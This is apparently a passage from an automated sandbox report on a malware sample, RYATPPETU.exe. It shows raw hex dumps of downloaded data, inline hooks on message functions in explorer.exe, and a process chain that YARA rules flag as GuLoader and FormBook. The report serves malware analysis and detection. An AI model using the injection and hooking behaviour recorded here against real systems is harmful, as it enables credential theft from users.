2021-10-27 18:17:10 UTC	62	IN	Data Raw: 56 f6 3e 97 81 35 0c 9d 3f 08 77 97 8b dd fd 94 d0 08 23 8c 03 e8 de 7a b7 57 a7 69 3a c6 e1 e8 ae 03 df a6 e1 68 d1 b6 97 fd 4a 65 d5 dd 38 ab ac 6a 23 3a 7b 61 aa bc ef 97 99 d3 e7 9f 02 96 bf 42 51 14 a0 cc 92 13 f8 fb d7 5b fa f9 46 79 84 fb 5e d5 f7 33 3a 3e 71 d8 cb 95 a5 da 3b b0 a2 50 c3 2c c5 f4 09 9b c0 81 5a b5 6a 44 9e 0f ac e8 5d 77 4e c3 26 8d df 04 52 09 9a 10 38 97 1e 14 ed 5e 17 1c 94 f9 9f 71 5c d5 be c7 f3 61 8a c5 53 ff 1a 33 28 28 91 49 12 b8 e1 23 4f fd af 36 0a a7 f4 49 90 03 7e 3e 07 2d f0 91 1a 49 e5 74 2d 93 e8 0e d5 dc a4 d5 d5 50 95 d7 5b 7e b2 92 fc d1 40 15 97 d7 4b bc 84 cf 1f 02 41 62 e2 47 17 eb fa 1d c8 f1 5d 77 b3 92 53 5e dd 23 69 18 61 34 38 47 72 2f d3 95 68 44 ed 48 e6 f1 59 f6 e0 b3 70 10 9a 10 25 cb c7 8b e8 3b 69 Data Ascii: V>5?w#zWi:hJe8j#:{aBQ[Fy^3:>q;P,ZjD]wN&R8^q\aS3((I#O6I~>-It-P[~@KAbG]wS^#ia48Gr/hDHYp%;i
2021-10-27 18:17:10 UTC	70	IN	Data Raw: 84 a8 02 59 d8 c8 91 0c 69 f9 75 19 f5 61 b5 b1 0b c4 f7 90 b5 7a cd 1b 23 4b 28 7b 77 3e a6 6d 94 e0 44 49 8a 4a 4d a0 cf 4c 4b 18 fc dd dd fb 2d 92 b7 1a 6d 11 88 0d ed 8c 35 3f a2 03 fa c0 6f 03 a6 fa 66 84 a7 d9 3c c3 8e 2e b8 91 e1 9e dc 8b 2b b2 26 fd d4 0b 8a 75 65 76 b2 6e 7d 41 bd 77 33 53 15 11 40 12 5c e0 cf 64 ec 78 43 ac 28 81 16 09 f6 4c f7 b7 3b f8 14 5d 5e 2c 4d 65 31 f3 93 0d 9f 7f 46 6f 21 a6 c4 22 fd 99 ee 15 56 5a 6e db f7 29 97 b1 34 70 b0 fa e7 a2 48 c0 3b 13 33 71 31 52 3c a3 68 53 1b a4 9e 53 0b c0 0f 8c 5c b2 af 90 73 6c 85 d5 0e b8 0e 82 09 33 be 06 86 68 7c 79 c2 a6 d1 10 a4 a0 55 af 3b f6 a9 60 1e b2 12 d5 c9 2c 98 ff 30 55 8e 1b 9c e1 77 68 4c 90 c6 cb 57 bd fc 6f 1d f6 a2 ad f5 45 d7 2c 48 27 96 2b 5f 95 07 45 2b c9 1e c4 74 Data Ascii: Yiuaz#K({w>mDIJMLK-m5?of<.+&uevn}Aw3S@\dxC(L;]^,Me1Fo!"VZn)4pH;3q1R<hSS\sl3h\|yU;`,0UwhLWoE,H'+_E+t
2021-10-27 18:17:10 UTC	78	IN	Data Raw: 59 66 a2 63 d9 5c d4 64 7e df 0c 9d 31 6a 35 54 8d cd d0 2f 79 53 b6 24 d7 41 54 0e 51 ee 1e b7 10 4a c0 5f e6 00 08 54 43 91 37 72 cc 74 bd b4 ba 8e 87 aa 61 7e 02 56 2b 67 ad d6 5a 49 c9 1c 16 dd a0 d2 46 bc 88 af 90 7f b8 fb 80 55 26 06 fc 30 8a fc 49 e4 f5 44 1a 91 8d 8b d8 12 2b b8 f7 69 73 0d 4b 3f 62 77 7e e0 bf aa 73 fa d5 23 8c 80 46 c9 72 f2 0f 41 c6 af b8 b7 ef 80 1b e2 59 1e 14 15 4e 4b 67 f2 64 58 50 14 0f d8 70 14 ff 75 d7 8c ac b4 1c f1 1b 08 7a 08 cb e3 12 5b 83 1f a7 8b d9 34 c4 07 14 bb 74 d0 fd 75 7b d5 83 fb 68 d8 38 ca 82 b1 1c 8a 53 e2 a6 c7 e3 d2 bd 4c 32 58 06 0c 5e 97 75 37 b9 a9 25 8f 6d 9d 12 b2 83 08 42 9e 23 dc 8b 0c 9d 5d 43 97 51 5f df df 85 b1 ec f4 b6 51 6e f0 84 2f e8 cf 37 dd ee 9c c5 a1 e0 b4 9c 43 07 68 35 65 e7 e0 73 Data Ascii: Yfc\d~1j5T/yS$ATQJ_TC7rta~V+gZIFU&0ID+isK?bw~s#FrAYNKgdXPpuz[4tu{h8SL2X^u7%mB#]CQ_Qn/7Ch5es
2021-10-27 18:17:10 UTC	86	IN	Data Raw: 23 f1 c0 b8 33 50 bf 99 3d a7 a4 dc bd d7 f2 b1 08 43 3a be 0c fb 15 89 d3 99 18 ff 06 e4 c2 eb 7a 8a 10 b3 92 f7 e2 df f3 6b 57 a4 e1 e7 40 d3 9f 36 04 fe 65 86 10 d1 c6 bf 0d 7c 59 82 fc d9 aa 33 78 25 1b 3e ce 2c 74 c1 cc 8e 94 b6 f2 e8 01 c2 aa 49 72 cd 49 36 d5 73 0e d6 ba 75 b1 00 61 b7 ad cc db 03 f9 a4 d9 b4 5a ba d2 56 62 b2 9c 52 3d f0 25 37 1d 92 db 2f cf c3 07 94 09 46 c6 84 8e a2 dc 37 17 47 af bd c1 c7 59 63 3b dd 98 d2 65 a7 98 e3 93 43 85 4d 5c a4 c8 c6 02 2f 32 17 08 9a 5f cb 4d 4a 95 16 86 05 7c 20 00 34 a6 20 be 67 98 02 1a 69 06 00 6d 70 41 d8 5f 5e ae ea 6d 16 fe 5c 8c c3 e7 66 f7 10 0e 89 f5 a2 d9 62 6c ce 2a f0 e0 96 ba 56 ef 56 a9 22 fd 26 16 14 88 0c 69 aa 83 8f 17 65 f2 ea 96 c6 d1 bb d5 da 84 e1 75 49 89 3a 60 18 2b 4e d3 c1 67 Data Ascii: #3P=C:zkW@6e\|Y3x%>,tIrI6suaZVbR=%7/F7GYc;eCM\/2_MJ\| 4 gimpA_^m\fbl*VV"&ieuI:`+Ng
2021-10-27 18:17:10 UTC	94	IN	Data Raw: 3a a9 5e 52 eb 87 34 46 3d 5f 94 87 ea 50 e5 74 18 86 20 ca 0f 6b 10 55 df 99 52 54 94 46 02 92 20 0c 32 68 a7 30 f6 29 5c 39 3d b4 83 fc c9 8c da 53 fd 5f 2e d1 d4 f4 fb fe 05 3d 1d 5c 85 e5 a2 5c d2 af 30 7b 12 8f 03 81 f5 32 97 1a cc b4 9d 59 e4 45 1c 63 2b a1 63 07 ad c8 dc 1c 68 05 f7 e5 08 d5 cc a4 f1 92 8e 68 20 d6 7e 5a fe 6c d8 54 59 3d 2d bf 2e 2e 8b a5 63 b0 9d 07 c4 86 a8 18 bc 0d 7e 27 1c 26 c9 0a 1f c6 2d cb 8b 39 29 42 a4 b4 c7 2f 90 71 20 8f ca 81 d3 c9 f4 8a 16 46 18 23 93 0f 8f d0 7d 72 91 b5 b6 1d 78 f4 66 ab db 89 04 a6 e8 fc 97 41 f7 0d af 02 75 ea e5 34 72 64 46 a2 43 14 26 83 6f 21 7a ae 8a 91 ce f4 e6 62 ee ad c8 5c 8b 0a 57 40 34 bc 1f b8 43 19 23 7d 74 03 e7 08 b2 07 ee 1b 9d bc 60 e2 8e 2f 4d 10 2c ec 57 0f a5 2d 8b 70 57 83 9f Data Ascii: :^R4F=_Pt kURTF 2h0)\9=S_.=\\0{2YEc+chh ~ZlTY=-..c~'&-9)B/q F#}rxfAu4rdFC&o!zb\W@4C#}t`/M,W-pW
2021-10-27 18:17:10 UTC	101	IN	Data Raw: 16 0d 30 a7 66 bf 61 72 93 16 35 02 2a 48 ea 7c 49 68 f0 6b d0 41 82 d7 23 1f 20 3a 14 b5 d5 38 7e 42 3a 89 f8 07 73 bd 9d 07 d0 36 44 b7 29 74 cf 65 e5 9e 35 f5 45 13 96 b3 f8 07 e3 fe 67 de ff 65 aa 5b 86 a9 be 93 77 06 ca 09 23 0b 31 40 5e 17 03 f9 63 e2 1e 8e ba c5 06 fc 1e cb 9b f5 ef db ea 0f 64 41 e8 e5 57 32 d2 ea 6d 97 cc 5c 27 c7 4e 30 f4 7f e9 be e7 8d e2 3f 44 00 49 3a 4f 05 14 15 21 12 25 03 68 6b b5 46 81 cf 36 31 2f 9a 79 f9 9c 95 b5 4f 4c d8 84 f9 6a 0b db 0c 3f 2c b6 a5 cc 87 c5 45 f3 8c d5 0d d5 8b 29 4b 58 35 cf c9 71 92 7f 64 3a d5 97 57 fd 59 93 12 4d 3b 4b fb 27 df 58 05 03 a6 af 0b 82 c7 b1 b9 31 73 2e 1b 28 4d 71 c1 59 6d e2 dd c9 42 57 48 ba 5f d8 a5 aa 0f 1c c9 e6 44 ca 70 e0 64 14 ba d8 80 68 6c 6f 76 a2 ac 78 98 4d 85 fe 75 eb Data Ascii: 0far5*H\|IhkA# :8~B:s6D)te5Ege[w#1@^cdAW2m\'N0?DI:O!%hkF61/yOLj?,E)KX5qd:WYM;K'X1s.(MqYmBWH_DpdhlovxMu
2021-10-27 18:17:10 UTC	109	IN	Data Raw: 9f 1a 06 0d a6 c9 e2 d3 27 cd 59 a6 d4 d7 f5 e7 6b ee 12 1e 39 b0 92 af b1 58 84 af 33 c6 1b 17 3c 02 2f 4e 2b 57 34 e2 d0 7f ab 7f 3e 35 30 57 fd e1 15 85 72 4f 93 6a a6 ad 1b f1 a1 14 1b ad 40 dd 2c 5a 8d d5 24 9f 63 15 b2 22 9f a0 df b4 94 e1 a9 41 67 81 c6 35 a4 79 8d e7 04 2f 01 59 d5 30 d2 2c cf 42 90 85 1e 77 9a 2c ea fd b9 c1 06 6f aa ae db c7 bc f9 97 15 a9 31 87 55 ae 49 7b 29 db 53 a2 4e a1 b2 13 aa a8 ac 2c 15 b5 7e 3f 63 65 8b 39 fb 32 dd 92 20 16 f7 a7 2f 87 16 6b 74 9b 54 fa a6 f1 94 74 e4 e4 1d cd ad 48 fb 59 35 24 32 39 36 25 a4 4c 6b e2 59 7f ce e6 89 3c 2e 08 e5 e3 43 2a a5 ef a4 10 d2 b9 d4 8c 39 bb 1c 15 24 ec 30 ff 37 bb 33 18 cf 54 2c ae 0f 50 05 ab 1f 06 0b 3b fd 79 f4 19 6b da 69 45 4d 01 ba a8 00 7d 3f b8 a9 4a d8 06 6b 98 e3 cf Data Ascii: 'Yk9X3</N+W4>50WrOj@,Z$c"Ag5y/Y0,Bw,o1UI{)SN,~?ce92 /ktTtHY5$296%LkY<.C*9$073T,P;ykiEM}?Jk
2021-10-27 18:17:10 UTC	117	IN	Data Raw: 7f a6 48 89 32 0c 8d c3 7f 68 29 f4 e8 47 79 74 30 b7 3a c6 af 93 18 66 51 ea 88 fc 87 1a e0 eb 04 92 9e 01 bb 6d 16 bc d0 80 bb e5 c1 f1 1a 95 30 a3 b9 63 c0 63 1d ea f9 3a 25 74 c6 d9 ea f2 0e 67 a4 89 45 1f 6b 6b 84 c1 ab 93 79 71 02 78 a4 81 41 4f b2 c8 d7 2d 7d 1a b1 df 86 6d 7e cc b6 95 64 92 93 97 65 a4 0d da 6c fa f7 e5 c6 5b 1d 6b e6 52 1c 0d 78 73 3a d6 29 c9 b3 3a 8e 4b b7 43 dc 01 11 b0 8e 56 8a c7 77 2b 15 e0 f6 1e 39 d4 4f 47 11 fc 23 3b 97 73 9d 7e 4d 1c 19 c3 dc c7 69 cb 92 39 d8 89 ec 7e 88 5e 8c 16 27 3f dd 6f 6b d3 ef b6 c3 d9 d8 0e 42 df 82 b0 b8 97 9c 8f 37 27 8c 53 30 97 8d f6 df 8c fb f3 44 83 59 e0 77 56 49 f3 06 a6 6d 86 e3 45 49 bf 94 e7 ce da f1 28 70 c1 66 c9 60 89 46 9a 19 84 8d 96 93 d6 c2 bf 09 72 53 c0 dd 86 ad e6 0c 95 cd Data Ascii: H2h)Gyt0:fQm0cc:%tgEkkyqxAO-}m~del[kRxs:):KCVw+9OG#;s~Mi9~^'?okB7'S0DYwVImEI(pf`FrS
2021-10-27 18:17:10 UTC	125	IN	Data Raw: c4 90 60 3f 5d 5a c4 ff d5 5f a3 95 55 ad fd c4 f8 c9 c5 c6 30 fc 1c 88 7c 3f 1e 5a 97 8d 54 00 cc 39 7d d2 02 87 0d 22 df e1 78 ba 59 75 8e 73 e0 24 86 16 8d 5f 60 cf 24 46 fb 21 3c bc f9 2f 73 58 1c d0 78 73 09 d5 3a 8f 1f ed 35 a4 a0 b4 37 8f 95 6f ef de ab 0f 34 f2 73 21 3a 4c c7 35 c3 61 e7 45 26 fe 22 92 de 6c 6a 2c 98 3d ad e3 63 40 ab 08 e6 c9 90 1e 8c 77 0a fa a8 bc 5a 83 4c 3f fb 11 88 1e cf 2e c6 de 6c 5d dc b8 6c e9 27 fc 9e 7c 9c dc 37 9b 91 03 77 7f e0 ee 98 4b d3 84 16 f5 67 d5 82 27 e3 0a c4 98 77 f2 30 d6 09 10 72 23 7d 7c fe 49 27 df 11 52 ab e2 b8 42 e7 b9 66 eb 1e 70 29 90 cb 3a 13 ff 28 da 4f 78 5c bf b6 6d 4d cd d7 94 37 6e 8c 45 ef ec ab 53 7e fa 19 ff b6 d2 e9 58 98 83 41 96 08 d1 d4 ca 98 f8 f7 3d ff c8 16 c4 2d 2c 0a c8 46 c4 da Data Ascii: `?]Z_U0\|?ZT9}"xYus$_`$F!</sXxs:57o4s!:L5aE&"lj,=c@wZL?.l]l'\|7wKg'w0r#}\|I'RBfp):(Ox\mM7nES~XA=-,F
2021-10-27 18:17:10 UTC	133	IN	Data Raw: 40 60 6a 1e 83 21 da 0a 38 ad da 95 b2 bd ed 0a 8c a0 39 b4 40 71 41 23 5d 00 64 77 49 42 dc 92 28 9c c5 ca 72 53 e9 56 9c 8b 71 57 8d 85 9b 4c 29 8b 73 8c da 41 4f e3 83 7a cc cc 41 40 49 f4 b4 92 12 6b c2 81 e1 96 a4 b8 db aa a2 91 97 ef 4a 1a 7f 31 1c e8 58 bd 9c e8 94 ca 73 a2 e4 e7 74 87 6b 79 aa 21 f5 b1 b4 24 d9 45 55 31 3f c3 6f 4e 71 9b de e1 a0 90 20 94 31 43 b7 94 30 38 74 7c e9 2b c3 ca d2 c3 77 ff c2 f3 17 92 b1 3e ac b1 0e 2b 4b 98 57 f9 a7 69 83 c0 d1 6a c9 c2 69 60 d3 01 26 bc ee f8 99 4a 9a b0 a6 5c 71 16 46 a9 96 4c b2 35 3d a6 ae 32 f8 dc 8f d3 db b7 80 b2 8e 20 75 c3 12 2e 73 21 f5 b2 e7 a8 db c4 6b ab 36 b0 33 99 65 f2 ce 84 a6 93 e0 c9 40 ea 90 2a ad 06 0f 39 9d 69 f6 ad 96 e3 7d bc 9d 72 33 98 4f b3 d7 26 8b 89 d9 75 0e 9f 69 db c2 Data Ascii: @`j!89@qA#]dwIB(rSVqWL)sAOzA@IkJ1Xstky!$EU1?oNq 1C08t\|+w>+KWiji`&J\qFL5=2 u.s!k63e@*9i}r3O&ui
2021-10-27 18:17:10 UTC	140	IN	Data Raw: dd f9 b2 68 dd ba a8 f1 76 cb be 8d 02 fa d6 a9 b9 bb f9 29 97 8c 37 22 07 9d e0 4a 00 88 96 f4 c4 02 1f 4b fe ef 06 64 09 96 eb 60 cd b2 85 0e e0 10 66 33 ed 39 d8 c4 d9 18 91 21 46 ad dc af 39 b0 4c 09 c1 e2 c3 35 dc 81 48 88 5c 59 74 a4 b3 3e 14 7a ad e6 27 40 be c1 dc 10 36 84 f4 f1 ab bd 0f 17 aa fb e1 3d 5b bc c0 3a a5 3b da 0a 69 ae bc b9 f2 50 7d 58 a3 1d 4b 94 19 97 6c 56 13 28 76 12 e5 0d 21 40 72 5e 94 a3 e5 3e 04 71 95 95 1e 1c 18 b5 81 8f 2c 42 12 db 71 58 78 38 48 45 7d 41 af 11 9b 2e 59 b2 64 b5 d1 67 05 de 9d 7f 1c 49 20 5e 22 03 f1 48 f6 19 7b a1 61 a9 ed f1 cc 4f 18 40 69 bd 1c 0d f4 97 bc e0 e1 bc 13 f9 00 dc d6 27 58 d5 fa 22 e0 d4 a7 1d a1 93 d2 71 a0 08 28 a7 7c a8 ac 76 35 a3 6d e7 15 49 ee 40 ba b8 d0 ea fa 6b 75 a1 69 99 01 5c 65 Data Ascii: hv)7"JKd`f39!F9L5H\Yt>z'@6=[:;iP}XKlV(v!@r^>q,BqXx8HE}A.YdgI ^"H{aO@i'X"q(\|v5mI@kui\e
2021-10-27 18:17:10 UTC	148	IN	Data Raw: e5 d7 84 a5 bd 41 3d 48 7a 48 75 d2 42 bc 31 16 89 0f f8 a1 64 27 cb 74 6d 3d 0a 22 b2 06 0b 01 d3 b3 df 54 b6 1d 78 61 f4 d4 35 03 59 48 84 52 c6 74 b1 bf 50 3d 8c 75 1f fc ff a4 e2 21 5a be e4 20 9b 35 6a 4d d0 8d ed 2d 45 36 e8 46 5e c0 8c e8 ce f2 f4 9a 4a ec b0 43 f6 fa 96 94 4a b5 a0 f9 e5 cf 25 e6 ba b0 a6 ff 51 15 42 72 e9 40 df 06 34 92 a7 b6 04 bd d0 f7 10 42 27 89 3c 4a 7b 3b a8 04 8c f0 39 d3 17 b3 05 c1 20 b0 f7 68 55 db ae 89 ac 75 4d 0c 85 b6 77 51 88 3b 07 ef 46 40 2c 8e 34 66 16 da 4a 14 a1 77 7e 81 c2 e7 34 73 f3 10 69 e8 75 f6 e1 ac b7 79 49 94 6b 59 33 42 35 51 d0 90 61 45 35 1c 94 49 fc 04 65 d2 c7 74 7c 5f 0e 68 3b d9 d3 de 6c 73 24 74 63 0f 9b 60 c1 72 2e 83 b6 47 85 c0 50 5d 77 bd 66 d9 f3 00 88 e0 21 29 27 07 f5 97 41 6b f2 ca ef Data Ascii: A=HzHuB1d'tm="Txa5YHRtP=u!Z 5jM-E6F^JCJ%QBr@4B'<J{;9 hUuMwQ;F@,4fJw~4siuyIkY3B5QaE5Iet\|_h;ls$tc`r.GP]wf!)'Ak
2021-10-27 18:17:10 UTC	156	IN	Data Raw: a8 a8 bf b5 e5 09 fb 09 a1 44 10 81 bb 6f dd ee 81 4c e7 d0 ba 3d 56 88 f8 12 8f 03 e1 16 93 28 ee 78 db bd bf fb 82 31 7a d2 7c 48 f9 10 86 73 c1 da 55 6b eb 3b 12 a2 12 3e 1b a6 f0 76 f3 fe 21 0c a3 3c 40 b5 40 3f 13 c2 53 62 b6 b3 72 5f 4e 72 93 08 0c 8f fb d4 78 b1 e3 b5 66 57 47 75 bb 19 85 cf 5c 18 ef 9b d6 44 58 a0 41 7f 6d 99 fb b9 6e dd 73 ff 88 5d ca 43 f7 6e b1 32 4f 10 03 b9 03 aa 47 85 12 3f 70 14 80 e6 13 b8 81 6c 21 10 bf 30 6a 71 28 c3 9e 32 1f f4 ba fe 47 b5 7c 55 1a 39 a2 70 65 8e 65 b6 81 4b 78 d0 34 2a fe 39 ca dd 8c 83 ae 6b fb f0 27 23 a0 fb b2 79 b7 10 a1 25 a9 53 d6 27 bd eb e4 d4 bd f5 f9 63 5a ee 8a 9e 1c 37 8c 12 0a e3 89 39 f0 13 86 e6 07 43 e5 42 19 38 12 7f c6 d4 98 5a 5d 94 b5 e1 f4 d8 6e 56 0a fe 4a 4d 9d 42 d2 0c 8b f0 f7 Data Ascii: DoL=V(x1z\|HsUk;>v!<@@?Sbr_NrxfWGu\DXAmns]Cn2OG?pl!0jq(2G\|U9peeKx4*9k'#y%S'cZ79CB8Z]nVJMB
2021-10-27 18:17:10 UTC	164	IN	Data Raw: d6 14 ad e4 dd 01 f0 6d 58 56 97 69 aa 77 29 ea eb 66 4d 52 d2 35 bb 48 00 44 72 a5 c3 8e e9 ec 86 fd 48 10 bd 41 2a c0 d5 ef 10 9a 81 1e ba ff f3 c9 7c 16 bc d9 15 34 1f b0 ae c5 09 44 0f ac 0a 52 57 7f 8b fc 1a f3 5d 6a af bb 09 f6 d7 b1 86 a1 86 62 f3 58 b1 c4 b6 83 2b 1f 0c 92 fd 50 f0 77 b9 a6 9f 0c 0c 01 f7 ea 25 ab e2 56 8e b4 0b 84 cb 44 29 f6 78 76 1f d3 37 74 07 c8 71 72 77 80 d0 1c 58 99 1a 63 0c 5c 90 6d 63 9e 61 2f 4b 17 73 ae 30 29 33 47 aa 30 ab 0b 7e 28 fd 84 c0 f0 12 01 73 e1 71 c1 51 f6 c3 4e aa 6d ab 1f cc 34 26 4b 73 26 fc e8 3f 3b 49 ee b1 b4 65 4d 1a 6e 4a 56 64 91 5b 45 6e 2f bc 18 25 e6 c9 3b c3 5c f6 22 c4 2e 29 e8 71 fa 3e 89 2c 88 7d f4 b3 f1 8a 87 13 2a 7b 5d 2e a4 08 2f 01 21 6b 22 17 5b db a0 f6 a3 b3 5d 24 48 c2 e9 61 b0 03 Data Ascii: mXViw)fMR5HDrHA\|4DRW]jbX+Pw%VD)xv7tqrwXc\mca/Ks0)3G0~(sqQNm4&Ks&?;IeMnJVd[En/%;\".)q>,}{]./!k"[]$Ha
2021-10-27 18:17:10 UTC	172	IN	Data Raw: 41 2c 58 f7 a2 8a 82 83 e4 90 06 6c 7a 00 85 24 f2 75 36 92 85 95 8c 6a 74 83 75 1c d7 18 89 45 ee b7 2e e1 fa 9c 19 c0 be b8 23 fc 03 35 21 88 2e 63 15 ea bb 0a 8b 94 8b d9 8f d0 1c b6 7b a0 51 03 f1 0f ed 17 d8 f5 39 c7 c6 9a 92 db 10 fa 07 1e 07 fe dd 72 c3 ba 65 70 47 4c cf d4 33 06 5d 4f 60 06 ca 5e a8 94 23 a6 0f c2 f6 35 85 63 29 9a 24 61 e2 bd c8 0e 5e cf 28 a1 07 09 23 53 56 fa 74 86 21 78 fb 95 c4 dd bc a1 9a 7c 3f 54 aa 86 bf ed 8f 5d b7 cf 72 e5 e2 ed 38 51 6c 41 57 be b7 90 0b 91 6f 3e 35 ef 98 50 0e f5 7b 69 f3 39 67 72 8e f5 32 c7 04 43 de 0d 38 b4 85 82 3b 80 73 ff 0f 42 0d 72 55 7b d6 60 51 61 77 40 cd 71 7d df 36 a3 6b 6b 1e 19 ed 79 73 14 da 3b da 8b 56 4c 51 50 40 c0 93 7e 65 df 9e 83 de f1 b4 e4 82 68 53 20 cf 82 61 59 bc 03 54 ea 47 Data Ascii: A,Xlz$u6jtuE.#5!.c{Q9repGL3]O`^#5c)$a^(#SVt!x\|?T]r8QlAWo>5P{i9gr2C8;sBrU{`Qaw@q}6kkys;VLQP@~ehS aYTG
2021-10-27 18:17:10 UTC	180	IN	Data Raw: 0c e0 6d 3b e7 3d 9e 97 ec 6e c1 9d 92 67 a0 86 8d c5 ef 6e 89 fe 0f 69 b1 7d a7 c3 27 e9 3d 42 37 46 d1 9b 15 b3 10 96 eb 17 76 76 00 0d 54 0b c4 73 1b 8b ee c1 8c 79 d2 62 a9 4f c8 ff 04 e4 79 70 aa 66 5c 58 97 95 ec 09 7c 4e a0 05 54 b4 df c2 51 73 62 5e 2f 27 c3 4a 79 9f 98 26 11 f1 76 a2 ca 8d 56 aa 21 4d 43 75 7c f6 14 fd 82 57 97 ff 24 34 f8 84 8a be cf 6b 16 ae 82 0c d0 21 d6 4f 78 97 36 63 79 75 73 aa bb cb 31 db 9a a0 5a fc 8c e7 c2 0e 89 0c 8a 5e 7b d4 36 08 c3 20 df 96 d5 4a 68 5c 31 c1 c6 1a 62 4d 62 f2 19 da c9 07 f5 aa c8 65 10 be 09 1e a8 84 d7 a0 b4 e9 b3 40 e3 d4 e8 f4 c1 b4 a6 d0 3b c1 e3 a6 bb 2f 10 22 44 0a 89 de fa b9 f6 13 0c e1 e1 75 65 4d c5 28 20 e0 20 e5 f5 60 fa 68 65 76 66 7e 6e 14 a7 3e 7b c1 a9 ff 7e 92 7f d5 89 e5 96 80 db Data Ascii: m;=ngni}'=B7FvvTsybOypf\X\|NTQsb^/'Jy&vV!MCu\|W$4k!Ox6cyus1Z^{6 Jh\1bMbe@;/"DueM( `hevf~n>{~

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEC
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEC
GetMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEC
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEC

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: RYATPPETU.exe PID: 1860 Parent PID: 5936

General

Start time:	20:14:50
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\RYATPPETU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RYATPPETU.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	7A4B8B634D2E94CD1E458AF5918BE3AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.404871380.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: RYATPPETU.exe PID: 2248 Parent PID: 1860

General

Start time:	20:16:05
Start date:	27/10/2021
Path:	C:\Users\user\Desktop\RYATPPETU.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\RYATPPETU.exe'
Imagebase:	0x7ff797770000
File size:	131072 bytes
MD5 hash:	7A4B8B634D2E94CD1E458AF5918BE3AA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.404385380.0000000000560000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.616454619.000000001E320000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.612918920.00000000000A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 2248

General

Start time:	20:17:11
Start date:	27/10/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.576052326.000000000675D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.562491951.000000000675D000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmmon32.exe PID: 5516 Parent PID: 3472

General

Start time:	20:17:40
Start date:	27/10/2021
Path:	C:\Windows\SysWOW64\cmmon32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmmon32.exe
Imagebase:	0xe90000
File size:	36864 bytes
MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.771139902.0000000004D20000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000F.00000002.772404240.000000000549F000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.769569620.0000000002EE0000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: 